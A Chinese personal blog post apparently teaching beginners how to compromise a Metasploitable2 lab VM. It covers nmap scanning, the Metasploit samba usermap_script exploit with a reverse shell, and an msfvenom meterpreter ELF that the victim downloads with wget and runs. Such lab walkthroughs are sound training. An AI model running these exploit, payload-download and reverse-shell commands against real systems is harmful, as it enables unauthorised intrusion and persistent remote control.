<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.1">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.1">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.1" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.1.1',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="假设目标机为Metasploitable2,对Linux机器进行渗透攻击,拿到shell并上传木马​           前言： 每个操作系统都会存在各种Bug,像Windows这样有版权的操作系统，微软公司会快速地开发针对这些Bug或漏洞的补丁，并为用户提供更新。全世界有大量的漏洞研究人员会夜以继日地发现、研究新的Bug,这些没有公布补丁的Bug就是所谓的0day漏洞，由于这种漏洞对网络安全具有">
<meta name="keywords" content="pgg,信息安全，小白教程，情感博主">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透Met2">
<meta property="og:url" content="https://pgg666.org/2019/01/17/渗透Met2/index.html">
<meta property="og:site_name" content="pgg学长">
<meta property="og:description" content="假设目标机为Metasploitable2,对Linux机器进行渗透攻击,拿到shell并上传木马​           前言： 每个操作系统都会存在各种Bug,像Windows这样有版权的操作系统，微软公司会快速地开发针对这些Bug或漏洞的补丁，并为用户提供更新。全世界有大量的漏洞研究人员会夜以继日地发现、研究新的Bug,这些没有公布补丁的Bug就是所谓的0day漏洞，由于这种漏洞对网络安全具有">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/1-jpg.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/2-jpg.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/3-jpg.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/4.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/5.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/6.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/7.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/8.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/9.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/10.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/11.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/12.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/13.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/14.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/15.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/16.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/17.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/19.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/20.png">
<meta property="og:image" content="http://tu.027cgb.com/613977/共计/21.png">
<meta property="og:image" content="http://tu1.027cgb.com/613977/共计/22.png">
<meta property="og:image" content="http://tu1.027cgb.com/613977/共计/23.png">
<meta property="og:updated_time" content="2019-04-03T06:28:24.217Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="渗透Met2">
<meta name="twitter:description" content="假设目标机为Metasploitable2,对Linux机器进行渗透攻击,拿到shell并上传木马​           前言： 每个操作系统都会存在各种Bug,像Windows这样有版权的操作系统，微软公司会快速地开发针对这些Bug或漏洞的补丁，并为用户提供更新。全世界有大量的漏洞研究人员会夜以继日地发现、研究新的Bug,这些没有公布补丁的Bug就是所谓的0day漏洞，由于这种漏洞对网络安全具有">
<meta name="twitter:image" content="http://tu.027cgb.com/613977/共计/1-jpg.png">



  <link rel="alternate" href="/atom.xml" title="pgg学长" type="application/atom+xml">



  
  
  <link rel="canonical" href="https://pgg666.org/2019/01/17/渗透Met2/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>渗透Met2 | pgg学长</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">pgg学长</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">花满楼</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://pgg666.org/2019/01/17/渗透Met2/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="pgg">
      <meta itemprop="description" content="我拿真心换明月,明月待我几时还">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="pgg学长">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">渗透Met2

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-01-17 00:00:00" itemprop="dateCreated datePublished" datetime="2019-01-17T00:00:00+08:00">2019-01-17</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2019-04-03 14:28:24" itemprop="dateModified" datetime="2019-04-03T14:28:24+08:00">2019-04-03</time>
              
            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="假设目标机为Metasploitable2-对Linux机器进行渗透攻击-拿到shell并上传木马"><a href="#假设目标机为Metasploitable2-对Linux机器进行渗透攻击-拿到shell并上传木马" class="headerlink" title="假设目标机为Metasploitable2,对Linux机器进行渗透攻击,拿到shell并上传木马"></a>假设目标机为Metasploitable2,对Linux机器进行渗透攻击,拿到shell并上传木马</h1><p>​           <strong>前言：</strong> <em>每个操作系统都会存在各种Bug,像Windows这样有版权的操作系统，微软公司会快速地开发针对这些Bug或漏洞的补丁，并为用户提供更新。全世界有大量的漏洞研究人员会夜以继日地发现、研究新的Bug,这些没有公布补丁的Bug就是所谓的0day漏洞，由于这种漏洞对网络安全具有巨大威胁，因此0day漏洞页成为黑客的最爱。实际上能掌握0day的黑客少之又少。</em></p>
<ol>
<li>首先，先进入msf框架内，在命令行输入：msfconsole   便可以进入msf内</li>
</ol>
<p><img src="http://tu.027cgb.com/613977/共计/1-jpg.png"></p>
<ol start="2">
<li><p>首先第一步用nmap扫描目标主机的Ip   </p>
<p><em>使用命令：nmap –sV 192.168.127.136</em></p>
</li>
</ol>
<p>   <img src="http://tu.027cgb.com/613977/共计/2-jpg.png"></p>
<ol start="3">
<li><p>在扫描结果中出现了Samba smbd 3.x-4.x 的服务，我们可以用search XXX  去查看可用的exploit   </p>
<p>  <em>使用命令： search samba</em></p>
</li>
</ol>
<p>   <img src="http://tu.027cgb.com/613977/共计/3-jpg.png"></p>
<p>   当看到excellent  说明是比较新，可以使用的</p>
<p>   <img src="http://tu.027cgb.com/613977/共计/4.png"></p>
<p>   那我们便使用这个exploit  </p>
<p>   命令语句：use exploit/multi/samba/usermap_script*</p>
<p>   <img src="http://tu.027cgb.com/613977/共计/5.png"></p>
<ol start="4">
<li><p>当我们进入后先看看他需要的设置和可用的payload</p>
<p>   命令： show options*</p>
</li>
</ol>
<p>   <img src="http://tu.027cgb.com/613977/共计/6.png"></p>
<p>​        命令：show payloads*</p>
<p><img src="http://tu.027cgb.com/613977/共计/7.png"></p>
<ol start="5">
<li><p>此时我们选择 的payload 是  cmd/unix/reverse  </p>
<p><em>使用命令：set payload cmd/unix/reverse</em></p>
<p><img src="http://tu.027cgb.com/613977/共计/8.png"></p>
</li>
</ol>
<p>​      现在开始绑定我们的数据  首先先确定被攻击主机的IP</p>
<p>​      命令是：set rhosts 192.168.127.136*</p>
<p><img src="http://tu.027cgb.com/613977/共计/9.png"></p>
<p>​      绑定端口   命令： set RPORT 139     这个端口必须得和发现漏洞德端口一致</p>
<p>​      绑定攻击主机的Ip   </p>
<p>​      命令：set lHOST 192.168.127.138*</p>
<p><img src="http://tu.027cgb.com/613977/共计/10.png"></p>
<ol start="6">
<li><p>然后就是直接连接被攻击机</p>
<p><em>命令： run</em></p>
</li>
</ol>
<p>   <img src="http://tu.027cgb.com/613977/共计/11.png"></p>
<ol start="7">
<li><p>这里我们已经连上被攻击机了 我们来查看一下我们是什么用户</p>
<p><em>命令：Whomai</em></p>
<p><img src="http://tu.027cgb.com/613977/共计/12.png"></p>
</li>
<li><p>经拿到被攻击机的shell了，但是并不满足如痴，想上传一个木马病毒，说干就干新开一个命令行窗口，新建一个病毒</p>
<p><em>命令：msfvenom -a x86 –platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻 击机IP LPORT=攻击机端口 -f elf -o payload.elf</em></p>
</li>
</ol>
<p>   <img src="http://tu.027cgb.com/613977/共计/13.png"></p>
<p>​         已经好了  我们ls看一下</p>
<p><img src="http://tu.027cgb.com/613977/共计/14.png"></p>
<ol start="9">
<li><p>现在我们开启ftp服务，用控制的shell去下载我们的病毒</p>
<p><em>命令： python -m SimpleHTTPServer 8000</em></p>
</li>
</ol>
<p>   <img src="http://tu.027cgb.com/613977/共计/15.png"></p>
<ol start="10">
<li><p>现在开始控制被攻击主机的shell去下载</p>
<p><em>命令： wget &lt;<a href="http://192.168.127.138:8000/payload.elf" target="_blank" rel="noopener">http://192.168.127.138:8000/payload.elf</a></em></p>
<p><em>&gt;</em></p>
<p><img src="http://tu.027cgb.com/613977/共计/16.png"></p>
</li>
</ol>
<p>​     已经下载成功了   我们ls查看下</p>
<p><img src="http://tu.027cgb.com/613977/共计/17.png"></p>
<ol start="11">
<li><p>已经有了 现在我们帮这个文件添加可执行权</p>
<p>命令  chmod +x payload.elf</p>
<p>然后执行</p>
<p>命令：  ./payload.elf</p>
</li>
</ol>
<pre><code>&lt;img src=&quot;http://tu.027cgb.com/613977/共计/18.png&quot; /&gt;
</code></pre><p>​       当然，此时是没有任何反应   现在我们进入exploit/multi/handler模块</p>
<p>​        <img src="http://tu.027cgb.com/613977/共计/19.png"></p>
<p>​      然后进入  linux/x86/meterpreter/reverse_tcp   模块</p>
<p><img src="http://tu.027cgb.com/613977/共计/20.png"></p>
<p>​      Show options一下</p>
<p><img src="http://tu.027cgb.com/613977/共计/21.png"></p>
<ol start="12">
<li>绑定攻击主机ip，然后运行挂起，在shell那边运行那个程序，然后sessions  一下</li>
</ol>
<p><img src="http://tu1.027cgb.com/613977/共计/22.png"></p>
<ol start="13">
<li>然后选择 sessions 1  就可以进入shell了</li>
</ol>
<p><img src="http://tu1.027cgb.com/613977/共计/23.png"></p>
<p>​       #注: <strong>好了，是不是很简单呀，不过要多尝试哦， 对其他系统也是可以的，只是命令不同</strong>-_—</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/01/17/php代码审计篇之伪协议/" rel="prev" title="伪协议">
                伪协议 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">pgg</p>
              <div class="site-description motion-element" itemprop="description">我拿真心换明月,明月待我几时还</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">7</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#假设目标机为Metasploitable2-对Linux机器进行渗透攻击-拿到shell并上传木马"><span class="nav-number">1.</span> <span class="nav-text">假设目标机为Metasploitable2,对Linux机器进行渗透攻击,拿到shell并上传木马</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">pgg</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.1.1</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.1"></script>

  <script src="/js/motion.js?v=7.1.1"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.1.1"></script>



  
  <script src="/js/scrollspy.js?v=7.1.1"></script>
<script src="/js/post-details.js?v=7.1.1"></script>



  


  <script src="/js/next-boot.js?v=7.1.1"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
